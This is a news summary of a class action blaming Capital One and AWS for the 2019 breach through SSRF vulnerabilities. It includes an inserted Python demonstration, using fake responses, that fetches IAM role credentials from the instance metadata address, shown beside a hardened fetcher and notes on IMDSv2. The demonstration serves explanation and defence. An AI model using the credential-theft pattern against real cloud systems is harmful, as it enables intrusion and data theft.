New Class Action Over 2019 Capital One Data Breach Centers on ‘Known Vulnerabilities’ Unaddressed by Amazon Web Services
Edmondson et al. v. Capital One Financial Corporation et al.
Filed: March 18, 2021 (No. 1:21-cv-00332)
A class action claims “known vulnerabilities” within Amazon Web Services’ cloud storage environment played a major role in the 2019 Capital One data breach that affected—and continues to affect—more than 106 million consumers.
Defendants: Amazon.com, Inc.; Capital One Bank (USA), N.A.; Capital One, N.A.; Capital One Financial Corporation; Amazon Web Services
Jurisdiction: Virginia
Five plaintiffs allege in a proposed class action that “known vulnerabilities” within Amazon Web Services’ cloud storage environment played a major role in the massive 2019 Capital One data breach that affected—and continues to affect—more than 106 million consumers.
The 84-page lawsuit, filed in Virginia federal court, blames the much-publicized breach, in which former Amazon employee Paige A. Thompson accessed, surreptitiously viewed, removed and publicized consumers’ private data, on Capital One’s and Amazon Web Services’ alleged failure to timely address cybersecurity vulnerabilities that were no secret to either company after the bank moved its data to Amazon’s public cloud in 2015.
Although Capital One tried to convince customers that their data, which would no longer be in the bank’s physical custody, would be safe on Amazon Web Services’ cloud, the defendants misrepresented how risky the shift actually was, the lawsuit alleges.
“For this move to work, Capital One would have to convince its present and prospective customers that their information would be safe,” the complaint reads. “With this in mind, both Capital One and AWS charted a course to make deceptive, false, misleading and unfair representations regarding the collection of customer data sitting on the public cloud.”
According to the suit, Capital One moved customers’ sensitive data to a cloud environment that “has long suffered from a widely known flaw,” namely that Amazon Web Services’ servers, apparently unlike those of competitors, were not secured against server-side request forgery (SSRF) attacks. In an SSRF attack, the suit says, an intruder is able to penetrate a firewall and exfiltrate data to a third-party server. SSRF attacks, and the exposure of Amazon’s servers to them in particular, have been openly discussed within the cybersecurity industry, the lawsuit says.
Amazon Web Services’ servers, the lawsuit says, are configured to allow different web applications to draw from their vast collection of data, but also allow for “the configuration of access ‘policies’ to allow the application to only pull the data it needs” using, for instance, identity and access management (IAM) roles. Per the case, an IAM role is an identity created in an account that has specific permissions that determine what the identity can and cannot do within Amazon Web Services. Unlike usernames and person-specific credentials, an IAM role is intended to be assumable by anyone who needs it and can be used to delegate Amazon Web Services access to users, applications or services “that do not normally have access to the restricted AWS data, or resources, stored by the owner of the cloud.”
Whereas IAM roles regulate access to data within Amazon Web Services’ servers, the only defense protecting that information from outside access is a firewall, an effective shield between a server and traffic originating from outside, the lawsuit says. A firewall not only blocks unauthorized access to a server while permitting authorized access and outbound communication, but also distinguishes between legitimate and illegitimate access requests, the case relays. Legitimate requests that pass the firewall are automatically assigned a “role” that establishes which portions of the server the individual on the other end can access, and on what conditions, per the suit.
According to the lawsuit, the firewalls used on the Amazon Web Services cloud “are known to be vulnerable to an SSRF attack,” wherein an unauthorized party tricks a server’s firewall into thinking they are permitted to request and access data. This is all an attacker needs to gain a foothold inside a targeted network, the suit stresses.
The plaintiffs say that although an SSRF attack was a well-known tactic employed by hackers, Amazon Web Services had “no protections built into its systems to protect against an SSRF attack” around the time of the summer 2019 Capital One data breach. Instead, because Amazon relied on IAM roles to control access to “sensitive resources,” the suit claims, an attacker who could gain access to a resource behind an Amazon firewall could then assume a privileged IAM role and “gain access to whatever data the role can access.”
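The mechanism the complaint is describing, shown in working code as an added example (this is illustration, not code from the lawsuit, Capital One or AWS): a server-side feature that fetches a client-supplied URL is pointed at the EC2 instance metadata address, 169.254.169.254, which answers with the temporary credentials of the IAM role attached to the instance, and whoever holds those credentials can then do whatever the role can. The metadata responses, role name and credentials below are constructed stand-ins so the script runs offline, and `files.example.com` with its address is an assumed public destination. The SSRF-prone fetcher is shown beside a hardened one that refuses any destination resolving to a non-public address.

```python
"""SSRF to instance-role credentials: naive fetcher vs. hardened fetcher.
Added illustration; not code from the complaint, Capital One or AWS.
The metadata service, role name and credentials are constructed fakes."""
import ipaddress
import json
from urllib.parse import urlparse

# Constructed stand-in for the EC2 instance metadata endpoint. The real
# service answers at 169.254.169.254 and, for an instance with an IAM role
# attached, returns that role's temporary credentials under
# /latest/meta-data/iam/security-credentials/<role-name>.
METADATA_IP = "169.254.169.254"
FAKE_ROLE = "example-app-role"          # hypothetical role name
FAKE_CREDS = {                          # constructed, not real credentials
    "AccessKeyId": "ASIAEXAMPLE00000000",
    "SecretAccessKey": "exampleSecretKeyNotReal",
    "Token": "exampleSessionTokenNotReal",
}
PUBLIC_HOSTS = {"files.example.com": "93.184.216.34"}  # assumed public host


def fake_metadata_transport(ip, path):
    """Pretend network: only the metadata IP answers, and only for the
    two paths the real service would serve for the attached role."""
    if ip != METADATA_IP:
        return 404, ""
    if path == "/latest/meta-data/iam/security-credentials/":
        return 200, FAKE_ROLE
    if path == f"/latest/meta-data/iam/security-credentials/{FAKE_ROLE}":
        return 200, json.dumps(FAKE_CREDS)
    return 404, ""


def fake_resolver(host):
    """Stand-in for DNS: literal IPs resolve to themselves, one assumed
    public hostname is known, everything else fails to resolve."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return PUBLIC_HOSTS.get(host)


def vulnerable_fetch(url, transport=fake_metadata_transport, resolver=fake_resolver):
    """The SSRF-prone pattern: fetch whatever URL the client supplied."""
    parsed = urlparse(url)
    ip = resolver(parsed.hostname)
    if ip is None:
        return 502, ""
    return transport(ip, parsed.path or "/")


class UnsafeDestination(ValueError):
    pass


def check_destination(url, resolver=fake_resolver):
    """Return the resolved IP for URL if it is an acceptable outbound target,
    else raise. Rejects non-HTTP schemes and any address that is not
    globally routable, which covers link-local 169.254.169.254, loopback
    and RFC 1918 internal services alike."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise UnsafeDestination(f"bad scheme or host: {url!r}")
    ip = resolver(parsed.hostname)
    if ip is None:
        raise UnsafeDestination(f"unresolvable host: {parsed.hostname!r}")
    if not ipaddress.ip_address(ip).is_global:
        raise UnsafeDestination(f"{parsed.hostname!r} resolves to non-public {ip}")
    return ip


def hardened_fetch(url, transport=fake_metadata_transport, resolver=fake_resolver):
    """Same fetch, but the destination is validated first and the connection
    goes to the validated IP; resolving the hostname a second time at connect
    would reopen the hole through DNS rebinding."""
    ip = check_destination(url, resolver)
    return transport(ip, urlparse(url).path or "/")


def steal_role_credentials(fetch):
    """What an attacker does with an SSRF primitive: ask the metadata service
    which role is attached, then fetch that role's credentials."""
    base = f"http://{METADATA_IP}/latest/meta-data/iam/security-credentials/"
    status, role = fetch(base)
    if status != 200:
        return None
    status, body = fetch(base + role)
    return json.loads(body) if status == 200 else None


if __name__ == "__main__":
    print("vulnerable fetcher leaks:", steal_role_credentials(vulnerable_fetch))
    try:
        steal_role_credentials(hardened_fetch)
    except UnsafeDestination as err:
        print("hardened fetcher refused:", err)
```

Two practitioner caveats. First, a denylist of address ranges is the weaker control; where the set of legitimate destinations is known, allowlist those hosts and reject everything else. Second, this is an application-layer fix; on the platform side, AWS's IMDSv2 (released November 2019, after the breach) requires a PUT request to obtain a session token before any metadata read, which a GET-only SSRF primitive cannot perform, so requiring IMDSv2 on instances closes this particular path independently of application code.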
The defendants—Capital One Financial Corporation; Capital One Bank (USA) N.A.; Capital One, N.A.; Amazon.com, Inc.; and Amazon Web Services, Inc.—represented to the public that a new tool they jointly developed, called Cloud Custodian, had addressed the inherent SSRF vulnerabilities on Amazon’s cloud, the lawsuit says, explaining that the tool would encrypt every piece of data and automatically scan the bank’s systems to ensure all servers and permissions were set according to defined policies. This is not what happened, the lawsuit says:
“But encrypting the data stored on the AWS servers did not solve the security vulnerability. Credentials assigned with IAM roles automatically decrypt the data the role is allowed to access. Therefore, if an intruder is able to gain access to an IAM role and get past the firewall, the IAM role will decrypt the data, allowing the unauthorized user access to unencrypted data. In other words, one key unlocks both sets of doors—the firewall and the encryption.”
On July 29, 2019, Capital One announced in a Securities and Exchange Commission filing that it had experienced a data breach affecting 100 million people in the United States and approximately six million in Canada, the lawsuit goes on. The perpetrator, a former Amazon Web Services system engineer, was able to gain access to sensitive Capital One data by going through a misconfigured firewall the bank was using as part of its cloud operations with Amazon, the complaint says. The incident went undiscovered by the defendants despite the fact that the perpetrator posted publicly about it on Twitter and other social media sites over the course of several months and that Capital One had records of the unauthorized intrusion, the case states.
Despite Capital One’s and Amazon’s assurances to the contrary, a vast amount of personal data was and remains dangerously exposed to theft and fraud, the suit alleges.
Consumer and small business data stolen in the breach included names, addresses, zip codes, phone numbers, email addresses, dates of birth, self-reported income figures, roughly 140,000 Social Security numbers, 80,000 bank account numbers, credit scores, credit card limits and balances, payment histories and fragments of transaction data from 2016, 2017 and 2018, the suit says.